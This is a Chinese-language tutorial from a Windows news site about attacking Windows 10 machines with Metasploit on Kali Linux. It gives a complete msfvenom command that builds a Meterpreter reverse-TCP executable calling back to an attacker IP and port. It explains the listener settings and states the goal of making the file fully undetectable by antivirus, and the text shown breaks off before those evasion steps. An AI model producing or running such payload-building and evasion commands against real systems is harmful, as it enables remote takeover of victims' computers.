Win10之家 资讯中心
Win10下载休闲娱乐坊
Win10资讯Win10资源
Win10交流主题壁纸
Win7下载Win8下载

Ghost Windows10 X64纯净专业       Ghost Windows10 X32纯净专业

如何在Kali Linux上使用Metasploit攻击Windows10机器

2018-08-06 13:26:18来源:Win10作者:Win10之家责编:swin103去评论

 介绍

Metasploit框架是全球黑客最常用的框架。它允许黑客设置创建有利环境(称为Meterpreter)的侦听器来操纵受感染的计算机。在本文中,我们将了解Kali Linux中的这个框架如何用于攻击Windows10计算机。我们将使用Shellter通过恶意可执行文件执行此操作。
 
本文假设已经完成了Kali Linux的安装,并且可以通过VirtualBox上的Windows机器的桥接连接来访问。
 
创建恶意.exe文件
要创建可执行文件,您可以使用msfvenom,如下面的命令所示:
 
msfvenom -p windows / meterpreter / reverse_tcp -a x86 -platform windows -f exe LHOST = 192.168.100.4 LPORT = 4444 -o /root/something32.exe
 
上面的命令指示msfvenom生成一个32位Windows可执行文件,该文件为有效负载实现反向TCP连接。必须将格式指定为类型.exe,并且必须定义本地主机(LHOST)和本地端口(LPORT)。在我们的例子中,LHOST是我们攻击的Kali Linux机器的IP地址,LPORT是在目标受到攻击后监听来自目标的连接的端口。
 
要获取我们的IP地址,我们在Kali中使用ifconfig命令,将接口指定为eth0(因为我们在以太网上),如下所示。

如何在Kali Linux上使用Metasploit攻击Windows10机器

下面的屏幕截图显示了成功.exe生成时命令的输出。

如何在Kali Linux上使用Metasploit攻击Windows10机器

防病毒解决方案通过检测可执行文件中的恶意签名来工作。 因此,我们的文件将在Windows环境中被标记为恶意文件。 因此,我们必须找到一种方法来修改它以绕过防病毒检测。 我们将对其进行编码以使其完全不可检测,或FUD。

相关文章

百度推荐

旗下网站: Win10之家|

旗下软件: Win10系统|

Win10 - 应用,游戏,下载 - Win10之家

Copyright (C) Swin10.com, All Rights Reserved.

Win10 版权所有 浙ICP备123456789号